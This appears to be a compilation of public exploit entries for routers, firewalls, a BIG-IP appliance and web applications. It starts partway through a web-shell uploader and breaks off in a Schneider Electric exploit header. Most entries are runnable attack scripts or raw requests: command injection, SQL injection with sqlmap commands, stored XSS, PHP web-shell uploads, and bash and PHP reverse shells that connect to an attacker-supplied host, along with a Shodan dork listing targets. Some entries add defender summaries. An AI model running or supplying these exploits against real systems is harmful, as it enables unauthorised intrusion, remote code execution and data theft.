echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream'), } upload_req = session_requests.post(HOSTNAME + 'index.php/myAccount/update', files=request_3) def main(HOSTNAME, EMAIL, PASSWORD): url = HOSTNAME + '/index.php/login' result = session_requests.get(url) #print(result.text) login_tree = html.fromstring(result.text) authenticity_token = list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0] payload = {'login[email]': EMAIL, 'login[password]': PASSWORD, 'login[_csrf_token]': authenticity_token} result = session_requests.post(HOSTNAME + '/index.php/login', data=payload, headers=dict(referer=HOSTNAME + '/index.php/login')) # The designated admin account does not have a myAccount page account_page = session_requests.get(HOSTNAME + 'index.php/myAccount') account_tree = html.fromstring(account_page.content) userid = account_tree.xpath("//input[@name='users[id]']/@value") username = account_tree.xpath("//input[@name='users[name]']/@value") csrftoken_ = account_tree.xpath("//input[@name='users[_csrf_token]']/@value") req(userid, username, csrftoken_, EMAIL, HOSTNAME) get_file = session_requests.get(HOSTNAME + 'index.php/myAccount') final_tree = html.fromstring(get_file.content) backdoor = requests.get(HOSTNAME + "uploads/users/") count = 0 dateStamp = "1970-01-01 00:00" backdoorFile = "" for line in backdoor.text.split("\n"): count = count + 1 if "backdoor.php" in str(line): try: start = "\"right\"" end = " </td" line = str(line) dateStampNew = line[line.index(start)+8:line.index(end)] if (dateStampNew > dateStamp): dateStamp = dateStampNew print("The DateStamp is " + dateStamp) backdoorFile = line[line.index("href")+6:line.index("php")+3] except: print("Exception occurred") continue #print(backdoor) print('Backdoor uploaded at - > ' + HOSTNAME + 'uploads/users/' + backdoorFile + '?cmd=whoami') if __name__ == '__main__': print("You are not able to use the designated admin account because they 
do not have a myAccount page.\n") parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit') parser.add_argument('-url', '--host', dest='hostname', help='Project URL') parser.add_argument('-u', '--email', dest='email', help='User email (Any privilege account)') parser.add_argument('-p', '--password', dest='password', help='User password') args = parser.parse_args() # Added detection if the arguments are passed and populated, if not display the arguments if (len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)): main(args.hostname, args.email, args.password) else: parser.print_help()

Telesquare SDT-CW3B1 1.1.0 - OS Command Injection

#!/usr/bin/python3 # Exploit Title: Telesquare SDT-CW3B1 1.1.0 - OS Command Injection # Date: 24th May 2022 # Exploit Author: Bryan Leong <NobodyAtall> # Vendor Homepage: http://telesquare.co.kr/ # CVE : CVE-2021-46422 # Authentication Required: No import requests import argparse import sys from xml.etree import ElementTree def sysArgument(): ap = argparse.ArgumentParser() ap.add_argument("--host", required=True, help="target hostname/IP") args = vars(ap.parse_args()) return args['host'] def checkHost(host): url = "http://" + host print("[*] Checking host is it alive?") try: rsl = requests.get(url) print("[*] The host is alive.") except requests.exceptions.Timeout as err: raise SystemExit(err) def exploit(host): url = "http://" + host + "/cgi-bin/admin.cgi?Command=sysCommand&Cmd=" #checking does the CGI exists? rsl = requests.get(url) if(rsl.status_code == 200): print("[*] CGI script exist!") print("[*] Injecting some shell command.") #1st test injecting id command cmd = "id" try: rsl = requests.get(url + cmd, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) cmdRet = [] for event, elem in xmlparser: if(elem.tag == 'CmdResult'): cmdRet.append(elem.text) except: print("[!] No XML returned from CGI script. Possible not vulnerable to the exploit") sys.exit(0) if(len(cmdRet) != 0): print("[*] There's response from the CGI script!") print('[*] System ID: ' + cmdRet[0].strip()) print("[*] Spawning shell. type .exit to exit the shell", end="\n\n") #start shell iteration while(True): cmdInput = input("[SDT-CW3B1 Shell]# ") if(cmdInput == ".exit"): print("[*] Exiting shell.") sys.exit(0) rsl = requests.get(url + cmdInput, stream=True) xmlparser = ElementTree.iterparse(rsl.raw) for event, elem in xmlparser: if(elem.tag == 'CmdResult'): print(elem.text.strip()) print('\n') else: print("[!] Something doesn't looks right. Please check the request packet using burpsuite/wireshark/etc.") sys.exit(0) else: print("[!] 
CGI script not found.") print(rsl.status_code) sys.exit(0) def main(): host = sysArgument() checkHost(host) exploit(host) if __name__ == "__main__": main()

Microweber CMS 1.2.15 - Account Takeover

# Exploit Title: Microweber CMS 1.2.15 - Account Takeover # Date: 2022-05-09 # Exploit Author: Manojkumar J # Vendor Homepage: https://github.com/microweber/microweber # Software Link: https://github.com/microweber/microweber/releases/tag/v1.2.15 # Version: <=1.2.15 # Tested on: Windows10 # CVE : CVE-2022-1631 # Description: Microweber Drag and Drop Website Builder E-commerce CMS v1.2.15 Oauth Misconfiguration Leads To Account Takeover. # Steps to exploit: 1. Create an account with the victim's email address. Register endpoint: https://target-website.com/register# 2. When the victim tries to login with default Oauth providers like Google, Github, Microsoft, Twitter, Linkedin, Telegram or Facebook etc(auth login) with that same e-mail id that we created account before, via this way we can take over the victim's account with the recently created login credentials.
# Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) # Google Dork: None # Date: November 1, 2021 # Exploit Author: Minh Khoa of VSEC # Vendor Homepage: https://ruijienetworks.com # Software Link: https://www.ruijienetworks.com/resources/products/1896-1900 # Version: ReyeeOS 1.55.1915 - EW_3.0(1)B11P35 and EW_3.0(1)B11P55 # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO # CVE: CVE-2021-43164 #!/usr/bin/python3 import os import sys import time import requests import json def enc(PASS): key = "RjYkhwzx$2018!" shell = "echo '{}' | openssl enc -aes-256-cbc -a -k '{}' -md md5 2>/dev/null".format(PASS, key) return os.popen(shell).read().strip() try: TARGET = sys.argv[1] USER = sys.argv[2] PASS = sys.argv[3] COMMAND = sys.argv[4] except Exception: print("CVE-2021-43164 PoC") print("Usage: python3 exploit.py <target> <user> <pass> <command>") print("Example: python3 exploit.py 192.168.110.1 admin password 'touch /tmp/pwned'") sys.exit(1) endpoint = "http://{}/cgi-bin/luci/api/auth".format(TARGET) payload = { "method": "login", "params": { "username": USER, "password": enc(PASS), "encry": True, "time": int(time.time()), "limit": False } } r = requests.post(endpoint, json=payload) sid = json.loads(r.text)["data"]["sid"] endpoint = "http://{}/cgi-bin/luci/api/wireless?auth={}".format(TARGET, sid) payload = { "method": "updateVersion", "params": { "jsonparam": "'; {} #".format(COMMAND) } } r = requests.post(endpoint, json=payload) print(r.text)

F5 BIG-IP 16.0.x - Remote Code Execution (RCE)

# Exploit Title: F5 BIG-IP 16.0.x - Remote Code Execution (RCE) # Exploit Author: Yesith Alvarez # Vendor Homepage: https://www.f5.com/products/big-ip-services # Version: 16.0.x # CVE : CVE-2022-1388 from requests import Request, Session import sys import json def title(): print(''' _______ ________ ___ ___ ___ ___ __ ____ ___ ___ / ____\ \ / / ____| |__ \ / _ \__ \|__ \ /_ |___ \ / _ \ / _ \ | | \ \ / /| |__ ______ ) | | | | ) | ) |_____| | __) | (_) | (_) | | | \ \/ / | __|______/ /| | | |/ / / /______| ||__ < > _ < > _ < | |____ \ / | |____ / /_| |_| / /_ / /_ | |___) | (_) | (_) | \_____| \/ |______| |____|\___/____|____| |_|____/ \___/ \___/ Author: Yesith Alvarez Github: https://github.com/yealvarez Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/ ''') def exploit(url, lhost, lport): url = url + 'mgmt/tm/util/bash' data = { "command":"run", "utilCmdArgs":"-c 'bash -i >& /dev/tcp/"+lhost+"/"+lport+" 0>&1'" } headers = { 'Authorization': 'Basic YWRtaW46', 'Connection':'keep-alive, X-F5-Auth-Token', 'X-F5-Auth-Token': '0' } s = Session() req = Request('POST', url, json=data, headers=headers) prepped = req.prepare() del prepped.headers['Content-Type'] resp = s.send(prepped, verify=False, timeout=15 ) #print(prepped.headers) #print(url) #print(resp.headers) #print(resp.json()) print(resp.status_code) if __name__ == '__main__': title() if(len(sys.argv) < 4): print('[+] USAGE: python3 %s https://<target_url> lhost lport\n'%(sys.argv[0])) print('[+] USAGE: python3 %s https://192.168.0.10 192.168.0.11 4444\n'%(sys.argv[0])) print('[+] Do not forget to run the listener: nc -lvp 4444\n') exit(0) else: exploit(sys.argv[1],sys.argv[2],sys.argv[3])
# Exploit Title: Royal Event Management System 1.0 - 'todate' SQL Injection (Authenticated) # Date: 2022-26-03 # Exploit Author: Eren Gozaydin # Vendor Homepage: https://www.sourcecodester.com/php/15238/event-management-system-project-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip # Version: 1.0 # Tested on: Windows 10 Pro + PHP 8.0.11, Apache 2.4.51 # CVE: CVE-2022-28080 # References: https://nvd.nist.gov/vuln/detail/CVE-2022-28080 ------------------------------------------------------------------------------------ 1. Description: ---------------------- Royal Event Management System 1.0 allows SQL Injection via parameter 'todate' in /royal_event/btndates_report.php#?= Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 2. Proof of Concept: ---------------------- In Burpsuite intercept the request from the affected page with 'todate' parameter and save it like poc.txt. Then run SQLmap to extract the data from the database: sqlmap -r poc.txt --dbms=mysql 3. Example payload: ---------------------- (boolean-based) -1%27+OR+1%3d1+OR+%27ns%27%3d%27ns 4. 
Burpsuite request: ---------------------- POST /royal_event/btndates_report.php#?= HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 334 Content-Type: multipart/form-data; boundary=f289a6438bcc45179bcd3eb7ddc555d0 Cookie: PHPSESSID=qeoe141g7guakhacf152a3i380 Referer: http://localhost/royal_event/btndates_report.php#?= User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="todate" -1' OR 1=1 OR 'ns'='ns --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="search" 3 --f289a6438bcc45179bcd3eb7ddc555d0 Content-Disposition: form-data; name="fromdate" 01/01/2011 --f289a6438bcc45179bcd3eb7ddc555d0--

SDT-CW3B1 1.1.0 - OS Command Injection

# Exploit Title: SDT-CW3B1 1.1.0 - OS command injection # Date: 2022-05-12 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: 1.0.0 # Vendor home page : http://telesquare.co.kr/ # Authentication Required: No # CVE : CVE-2021-46422 # Tested on: Windows # HTTP Request GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=id HTTP/1.1 Host: IP_HERE User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: */* Referer: http:// IP_HERE /admin/system_command.shtml Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close

T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS)

# Exploit Title: T-Soft E-Commerce 4 - 'UrunAdi' Stored Cross-Site Scripting (XSS) # Exploit Author: Alperen Ergel (alpernae IG/TW) # Web Site: https://alperenae.gitbook.io/ # Software Homepage: https://www.tsoft.com.tr/ # Version : v4 # Tested on: Kali Linux # Category: WebApp # Google Dork: N/A # Date: 2022-05-10 # CVE :N/A ######## Description ######## # # 1-) Login administrator page and add product # # 2-) add product name to xss payload # # 3-) Back to web site then will be work payload # # ######## Proof of Concept ######## ========>>> REQUEST <<<========= POST /Y/Moduller/_Urun/Ekle/Action.php HTTP/1.1 Host: domain.com Cookie: lang=tr; v4=on; nocache=1; TSOFT_USER=xxxx@xxx.com; customDashboardMapping=true; PHPSESSID=18d05ae557640c93fd9739e241850438; rest1SupportUser=0; nocache=1; last_products=12 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 1028 Origin: https://domain.com Dnt: 1 Referer: https://domain.com/srv/admin/products/save-edit/index?id=12 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close task=UPDATE&Kategori=18&UrunId=12&UrunAdi={PAYLOAD}&MarkaId=0&MarkaAd=&ModelId=0&ModelAd=&Tedarikci=0&TedarikciKodu=12&StokSayisi=100 &StokBirimId=1&StokBirimAd=Adet&EnYeniUrun=0&EnCokSatilan=0&AramaKelimeleri=&HamSatis=200&AlisFiyat=100&HavaleYuzde=0&Birim=0 &KDV=18&KdvGoster=false&point_catalog=false&IndirimliUrun=true&AltUrunVar=false&YeniUrun=true&AnaSayfaUrun=true&VitrinUrun=false &Gorunme=true&BayiUrun=false&SiparisNotuGoster=false&En=0&Boy=0&Derinlik=0&Agirlik=0&Desi=1&GarantiBilgisi= &TeslimatBilgisi=&UrunNot=&WsUrunKodu=T12&SeoAyar=3&SeoTitle=&SeoLink=deneme-urun-1&SeoDesc=&SeoKeyw= &Detay=%C3%9Cr%C3%BCn%20ekleme%20konusunda%20detayl%C4%B1%20bilgi%20i%C3%A7in%2C%20videomuzu%20 
izleyebilirsiniz%3A%C2%A0%0A%3Cdiv%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DoWlUHvi4IPw%22%3Ehttps%3A%2F%2Fwww.youtube.com% 2Fwatch%3Fv%3DoWlUHvi4IPw%3C%2Fa%3E%3C%2Fdiv%3E&AnaKategoriId=18&point=0&subscribe=0&subscribe_frequency=&subscribe_discount_rate=0 &UruneKargoUcretsiz=0&UyeUcretsizKargo=0&BayiUcretsizKargo=0&Sayisal1=0

SolarView Compact 6.0 - OS Command Injection

# Exploit Title: SolarView Compact 6.0 - OS Command Injection # Date: 2022-05-15 # Exploit Author: Ahmed Alroky # Author Company : AIactive # Version: ver.6.00 # Vendor home page : https://www.contec.com/ # Authentication Required: No # CVE : CVE-2022-29303 # Tested on: Windows # Exploit # HTTP Request : POST /conf_mail.php HTTP/1.1 Host: HOST_IP Content-Length: 77 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://HOST_IP Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://HOST_IP/conf_mail.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close mail_address=%3Bid%3Bwhoami%3Bpwd%3Bls%3B&button=%83%81%81%5B%83%8B%91%97%90M

OpenCart v3.x Newsletter Module - Blind SQLi

# Exploit Title: OpenCart v3.x Newsletter Module - Blind SQLi # Date: 19/05/2022 # Exploit Author: Saud Alenazi # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=32750&filter_member=Zemez # Version: v.3.0.2.0 # Tested on: XAMPP, Linux # Contact: https://twitter.com/dmaral3noz * Description : Newsletter Module is compatible with any Opencart allows SQL Injection via parameter 'zemez_newsletter_email' in /index.php?route=extension/module/zemez_newsletter/addNewsletter. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. * Steps to Reproduce : - Go to : http://127.0.0.1/index.php?route=extension/module/zemez_newsletter/addNewsletter - Save request in BurpSuite - Run saved request with : sqlmap -r sql.txt -p zemez_newsletter_email --random-agent --level=5 --risk=3 --time-sec=5 --hex --dbs Request : =========== POST /index.php?route=extension/module/zemez_newsletter/addNewsletter HTTP/1.1 Content-Type: application/x-www-form-urlencoded Cookie: OCSESSID=aaf920777d0aacdee96eb7eb50 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate Content-Length: 29 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Connection: Keep-alive zemez_newsletter_email=saud =========== Output : Parameter: zemez_newsletter_email (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: zemez_newsletter_email=saud%' AND 4728=(SELECT (CASE WHEN (4728=4728) THEN 4728 ELSE (SELECT 4929 UNION SELECT 7220) END))-- - Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: zemez_newsletter_email=saud%' OR (SELECT 4303 FROM(SELECT COUNT(*),CONCAT(0x716a6b7171,(SELECT 
(ELT(4303=4303,1))),0x7162787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'xlVz%'='xlVz Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: zemez_newsletter_email=saud%' AND (SELECT 5968 FROM (SELECT(SLEEP(5)))yYJX) AND 'yJkK%'='yJkK

m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)

# Exploit Title: m1k1o's Blog v.10 - Remote Code Execution (RCE) (Authenticated)
# Date: 2022-01-06
# Exploit Author: Malte V
# Vendor Homepage: https://github.com/m1k1o/blog
# Software Link: https://github.com/m1k1o/blog/archive/refs/tags/v1.3.zip
# Version: 1.3 and below
# Tested on: Linux
# CVE : CVE-2022-23626
#
# NOTE(review): this listing had been collapsed onto a few long lines; the
# layout below is reconstructed from statement order. The multipart body in
# generate_payload() is kept exactly as it appears in the listing - its line
# breaks did not survive, and multipart/form-data needs CRLF-separated
# lines, so confirm against the original source before trusting it.
#
# Defender's summary: an authenticated user uploads a file named
# *.gif.php through /ajax.php?action=upload_image and then fetches it from
# /data/i/<name>. Indicators: upload requests whose filename carries a
# double extension ending in .php, and files with a .php suffix under the
# image directory. Mitigation is a server-side extension allow-list plus
# serving the upload directory without script execution.

import argparse
import json
import re
from base64 import b64encode

import requests as req
from bs4 import BeautifulSoup

parser = argparse.ArgumentParser(description='Authenticated RCE File Upload Vulnerability for m1k1o\'s Blog')
parser.add_argument('-ip', '--ip', help='IP address for reverse shell', type=str, default='172.17.0.1', required=False)
parser.add_argument('-u', '--url', help='URL of machine without the http:// prefix', type=str, default='localhost', required=False)
parser.add_argument('-p', '--port', help='Port for the Blog', type=int, default=8081, required=False)
parser.add_argument('-lp', '--lport', help='Listening port for reverse shell', type=int, default=9999, required=False)
parser.add_argument('-U', '--username', help='Username for Blog user', type=str, default='username', required=False)
parser.add_argument('-P', '--password', help='Password for Blog user', type=str, default='password', required=False)
args = vars(parser.parse_args())

username = args['username']
password = args['password']
lhost_ip = args['ip']
lhost_port = args['lport']
address = args['url']
port = args['port']
url = f"http://{address}:{port}"

# Mutable module state, updated through `global` in the helpers below.
blog_cookie = ""
csrf_token = ""
exploit_file_name = ""

# Built once at import time, while csrf_token and blog_cookie are still "";
# the f-strings are evaluated here, so this dict never sees the real values.
# It is declared `global` in call_malicious_php() but never read anywhere.
header = {
    "Host": f"{address}",
    "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
    "X-Requested-With": "XMLHttpRequest",
    "Csrf-Token": f"{csrf_token}",
    "Cookie": f"PHPSESSID={blog_cookie}"
}


def get_cookie(complete_url):
    """GET complete_url, store the PHPSESSID it sets and extract the CSRF token.

    The `if not blog_cookie` branch sends `Cookie: PHPSESSID=` (empty)
    precisely when no cookie is known yet - probably the inverse of what
    was intended; harmless in practice because the server issues a fresh id.
    Raises KeyError if the 200 response sets no PHPSESSID cookie.
    """
    global blog_cookie
    cookie_header = {}
    if not blog_cookie:
        cookie_header['Cookie'] = f"PHPSESSID={blog_cookie}"
    result = req.get(url=complete_url, headers=cookie_header)
    if result.status_code == 200:
        blog_cookie = result.cookies.get_dict()['PHPSESSID']
        print(f'[+] Found PHPSESSID: {blog_cookie}')
        grep_csrf(result)


def grep_csrf(result):
    """Pull a 10-character lowercase-hex token out of the page's second <script> tag.

    Layout-dependent: IndexError if the page has fewer than two script
    tags, AttributeError if no 10-hex-digit run is found.
    """
    global csrf_token
    csrf_regex = r"[a-f0-9]{10}"
    soup = BeautifulSoup(result.text, 'html.parser')
    script_tag = str(soup.findAll('script')[1].contents[0])
    csrf_token = re.search(csrf_regex, script_tag).group(0)
    print(f'[+] Found CSRF-Token: {csrf_token}')


def login(username, password):
    """Fetch a session + CSRF token, then POST action=login to /ajax.php.

    The credentials are interpolated into the form body without URL
    encoding, so '&', '=' or '%' in either value corrupts the request.
    Only prints the outcome; a failed login does not stop the script.
    """
    get_cookie(url)
    login_url = f"{url}/ajax.php"
    login_data = f"action=login&nick={username}&pass={password}"
    login_header = {
        "Host": f"{address}",
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "X-Requested-With": "XMLHttpRequest",
        "Csrf-Token": f"{csrf_token}",
        "Cookie": f"PHPSESSID={blog_cookie}"
    }
    result = req.post(url=login_url, headers=login_header, data=login_data)
    soup = BeautifulSoup(result.text, 'html.parser')
    login_content = json.loads(soup.text)
    if login_content.get('logged_in'):
        print('[*] Successful login')
    else:
        print('[!] Bad login')


def set_cookie(result):
    """Store the PHPSESSID from a response. Not called anywhere in this listing."""
    global blog_cookie
    blog_cookie = result.cookies.get_dict()['PHPSESSID']


def generate_payload(command):
    """Return the raw multipart body that uploads a PHP file disguised with a GIF prefix.

    `command` is base64-encoded so that quoting inside the PHP source is not
    an issue. See the module note about the lost line breaks in this literal.
    """
    return f""" -----------------------------13148889121752486353560141292 Content-Disposition: form-data; name="file"; filename="malicious.gif.php" Content-Type: application/x-httpd-php GIF<?php system(base64_decode('{b64encode(bytes(command, 'utf-8')).decode('ascii')}')); ?>; -----------------------------13148889121752486353560141292-- """


def send_payload():
    """Upload the payload file through the image-upload action and record its server-side name.

    The request is routed through a hard-coded proxy at 127.0.0.1:8080
    (likely an interception-proxy leftover); without something listening
    there, requests raises ProxyError.
    """
    payload_header = {
        "Host": f"{address}",
        "Content-Type": "multipart/form-data; boundary=---------------------------13148889121752486353560141292",
        "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "X-Requested-With": "XMLHttpRequest",
        "Csrf-Token": f"{csrf_token}",
        "Cookie": f"PHPSESSID={blog_cookie}"
    }
    upload_url = f"http://{address}:{port}/ajax.php?action=upload_image"
    command = f"php -r '$sock=fsockopen(\"{lhost_ip}\",{lhost_port});exec(\"/bin/bash <&3 >&3 2>&3\");'"
    payload = generate_payload(command)
    print(f"[+] Upload exploit")
    result = req.post(url=upload_url, headers=payload_header, data=payload, proxies= {"http": "http://127.0.0.1:8080"})
    set_exploit_file_name(result.content.decode('ascii'))


def set_exploit_file_name(data):
    """Extract the stored file name from the upload response.

    The '.' in the pattern is unescaped, so it matches any character;
    AttributeError if the response contains no such name.
    """
    global exploit_file_name
    file_regex = r"[a-zA-Z0-9]{4,5}.php"
    exploit_file_name = re.search(file_regex, data).group(0)


def call_malicious_php(file_name):
    """GET the uploaded file under /data/i/ so the server executes it. `result` is unused."""
    global header
    complete_url = f"{url}/data/i/{file_name}"
    print('[*] Calling reverse shell')
    result = req.get(url=complete_url)


def check_reverse_shell():
    """Ask the operator whether a listener is running; True/False, or None for any other answer."""
    yes = {'yes', 'y', 'ye', ''}
    no = {'no', 'n'}
    choice = input("Have you got an active netcat listener (y/Y or n/N): ")
    if choice in yes:
        return True
    elif choice in no:
        print(f"[!] Please open netcat listener with \"nc -lnvp {lhost_port}\"")
        return False


def main():
    """Entry point: confirm listener, log in, upload, then trigger the file."""
    enabled_listener = check_reverse_shell()
    if enabled_listener:
        login(username, password)
        send_payload()
        call_malicious_php(exploit_file_name)


if __name__ == "__main__":
    main()

Zyxel USG FLEX 5.21 - OS Command Injection

# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525
#
# NOTE(review): this listing had been collapsed onto two long lines; the
# layout below is reconstructed from statement order.
#
# Defender's summary: one unauthenticated POST to /ztp/cgi-bin/handler with
# a JSON body whose "command" is setWanPortSt and whose "mtu" field holds
# shell text instead of a number. An "mtu" value that is not an integer in
# requests to that handler is the indicator; the vendor fix and keeping the
# WAN-side management surface closed are the mitigations.

from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse

parser = argparse.ArgumentParser(
    prog="CVE-2022-30525.py",
    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")
args = parser.parse_args()

# Base64-encoded ASCII-art banner, decoded and printed by main().
banner = (
    "ICwtLiAuICAgLCAsLS0uICAgICAsLS4gICAsLS4gICwtLiAgLC0uICAgICAgLC0tLCAgLC0uICA7"
    "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
    "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
    "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
    "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
    "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
    "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
    "biA6KSApCg=="
)


def main():
    """Validate arguments, normalise the URL and hand off to exploit()."""
    print("\n" + base64.b64decode(banner).decode("utf-8"))
    if None in vars(args).values():
        print(f"[!] Please enter all parameters !")
        parser.print_help()
        sys.exit()
    # Substring test, not a prefix test: any URL containing "http" anywhere
    # is left as-is.
    if "http" not in args.url:
        args.url = "https://" + args.url
    args.url += "/ztp/cgi-bin/handler"
    exploit(args.url, args.host, args.port)


def exploit(url, host, port):
    """POST the crafted setWanPortSt request and report based on whether a response arrived.

    Success is inferred indirectly: the try/except/finally below prints
    "Enjoy your shell" whenever `response` is unbound, i.e. whenever the
    request did not complete (timeout or Ctrl-C), and "Can't exploit" for
    any completed request regardless of status code. On a timeout both
    "Bye Bye" and "Enjoy your shell" are printed, because `finally` runs
    after the sys.exit(1) in the except branch.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
        "Content-Type": "application/json",
    }
    data = {
        "command": "setWanPortSt",
        "proto": "dhcp",
        "port": "4",
        "vlan_tagged": "1",
        "vlanid": "5",
        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
        "data": "hi",
    }
    # verify=False below disables certificate validation; this silences the warning.
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")
    try:
        response = requests.post(
            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
        )
    except (KeyboardInterrupt, requests.exceptions.Timeout):
        print("[!] Bye Bye hekcer !")
        sys.exit(1)
    finally:
        try:
            print("[!] Can't exploit the target ! Code :", response.status_code)
        except:
            # NameError when `response` was never assigned; the bare except
            # also hides any other error raised while printing.
            print("[!] Enjoy your shell !!!")


if __name__ == "__main__":
    main()
# Exploit Title: Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)
# Exploit Author: LiquidWorm

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 Remote Root Exploit
#
#
# Vendor: Schneider Electric SE
# Product web page: https://www.se.com | https://www.clipsal.com
# Product details:
# - https://www.clipsal.com/Trade/Products/ProductDetail?catno=5500SHAC
# - https://www.se.com/ww/en/product/5500AC2/application-controller-spacelogic-cbus-rs232-485-ethernet-din-mount-24v-dc/
# Affected version: CLIPSAL 5500SHAC (i.MX28)
#                   CLIPSAL 5500NAC (i.MX28)
#                   SW: 1.10.0, 1.6.0
#                   HW: 1.0
#                   Potentially vulnerable (alternative products/same codebase?): 5500NAC2 and 5500AC2
#                   SpaceLogic C-Bus
#
